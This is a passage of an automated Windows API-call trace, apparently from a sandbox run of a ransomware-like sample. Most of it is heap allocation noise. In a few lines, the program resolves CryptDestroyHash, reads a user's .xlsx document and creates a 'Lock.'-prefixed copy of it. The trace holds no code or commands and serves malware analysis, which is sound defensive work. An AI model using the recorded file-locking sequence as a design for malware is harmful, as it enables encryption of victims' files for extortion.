| out: hHeap=0x25c0000) returned 1 [0262.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0262.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0262.540] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0262.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0262.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0262.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0262.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0262.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0262.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0262.540] CryptDestroyHash (hHash=0xaa5760) returned 1 [0262.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0262.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0262.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0262.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0262.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0262.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0262.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0262.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0262.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0262.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0262.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0262.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0262.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0262.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0262.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0262.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0262.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0262.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0262.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0262.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0262.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0262.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0262.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0262.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0262.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0262.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0262.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0262.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0262.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0262.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0262.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0262.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0262.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0262.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0262.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0262.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0262.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0262.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0262.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0262.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0262.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0262.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0262.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0262.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0262.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0262.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0262.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0262.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0262.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0262.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0262.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0262.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0262.544] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0262.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0262.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0262.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0262.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0262.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0262.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0262.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0262.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0262.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0262.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0262.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0262.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0262.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0262.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0262.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0262.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0262.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0262.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0262.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0262.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0262.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0262.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0262.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0262.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0262.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0262.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0262.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0262.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0262.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0262.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0262.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0262.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0262.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0262.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0262.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0262.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0262.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0262.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0262.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0262.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0262.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0262.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0262.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0262.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0262.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0262.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0262.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0262.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0262.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0262.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0262.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0262.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0262.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0262.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0262.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0262.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0262.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0262.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0262.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0262.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0262.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0262.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0262.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0262.549] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0262.549] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.549] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.549] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0262.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0262.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0262.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0262.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0262.549] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/goQ5n58_cIUllMnUx.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\goq5n58_ciullmnux.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0262.550] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0262.550] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0262.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0262.551] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0262.551] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.551] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0262.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0262.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0262.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0262.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0262.551] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/Lock.goQ5n58_cIUllMnUx.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lock.goq5n58_ciullmnux.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0262.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0262.552] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0262.552] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.552] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0262.552] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0262.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0262.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0262.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0262.553] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0262.553] ReadFile (in: hFile=0x268, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x9e84, lpOverlapped=0x0) returned 1 [0262.555] ReadFile (in: hFile=0x268, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0262.559] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0262.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0262.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0262.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0262.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x9e84) returned 0x3571018 [0262.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0262.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3571018 | out: hHeap=0x25c0000) returned 1 [0262.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0262.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0262.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0262.561] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0262.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0262.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0262.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0262.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0262.561] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0262.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0262.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0262.562] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0262.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0262.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0262.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1838 [0262.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0262.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0262.562] RtlAllocateHeap 